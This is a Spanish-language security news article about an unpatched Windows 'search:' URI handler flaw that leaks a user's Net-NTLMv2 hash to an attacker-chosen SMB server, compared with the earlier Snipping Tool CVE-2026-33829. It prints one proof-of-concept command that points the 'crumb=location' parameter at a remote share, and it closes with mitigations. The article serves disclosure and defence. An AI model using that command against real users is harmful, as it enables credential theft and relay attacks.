Investigadores de ciberseguridad han revelado detalles de un problema sin parchear que podría explotarse para revelar el hash NTLMv2 de un usuario al atacante.
Como en el caso de CVE-2026-33829que afectó al controlador ms-screensketch: URI de la herramienta de recorte de Windows, el problema recién señalado reside en la búsqueda: controlador URI, según Cazadora.
CVE-2026-33829 hace referencia a una vulnerabilidad de suplantación de identidad que podría exponer información confidencial a un actor no autorizado. Microsoft lo parchó en abril de 2026.
«Un atacante podría inducir al usuario a hacer clic en un enlace especialmente diseñado en un navegador web u otra fuente URL, incrustándolo en una página web o mensaje de correo electrónico», señaló Microsoft en su aviso en ese momento.
«Si el usuario aprueba el lanzamiento del enlace, la URL diseñada puede inducir a la computadora a conectarse a un servidor SMB elegido por el atacante, lo que revelaría el hash NTLMv2 del usuario al atacante, quien podría usarlo para autenticarse como usuario».
Específicamente, el problema tenía que ver con el hecho de que el controlador de URI de la herramienta de recorte aceptó un parámetro «filePath», no pudo validarlo y llegaría a cualquier ruta de la Convención de nomenclatura universal (UNC) que se le pasara. Esto, a su vez, podría activar la autenticación NTLM y exponer el hash Net-NTLMv2 de la víctima al atacante.
La deficiencia recién descubierta logra el mismo objetivo final usando «buscar:» y «crumb=ubicación:» en lugar de «filePath» usando un comando como el siguiente:
start "" "search:query=test&crumb=location:\\10.0.1.100\share"
«Utilizó el mismo mecanismo de fuga NTLM, produjo la misma fuga Net-NTLMv2, tenía los mismos requisitos previos y tenía la misma calificación Moderada», dijo el investigador de Huntress, Andrew Schwartz. Vale la pena señalar que el uso de un parámetro «crumb» para robar el hash (CVE-2023-35636) era documentado por Varonis en febrero de 2024.
Como resultado, un actor de amenazas podría aprovechar el hash capturado para realizar ataques de retransmisión y obtener un acceso más profundo a una red. Tras la divulgación responsable el 15 de abril de 2026, Microsoft se negó a abordar el problema y afirmó que «solo los casos de gravedad importantes y críticos cumplen con nuestro estándar de servicio».
En ausencia de una solución, se recomienda bloquear SMB saliente (TCP/445 y TCP/139) en hosts que no lo necesitan, aplicar la firma SMB para que los hashes capturados no puedan transmitirse a servicios internos y deshabilitar NTLM cuando corresponda.



